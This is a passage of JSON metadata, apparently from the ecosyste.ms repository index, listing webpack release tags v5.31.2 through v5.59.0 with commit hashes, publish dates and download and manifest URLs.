webpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/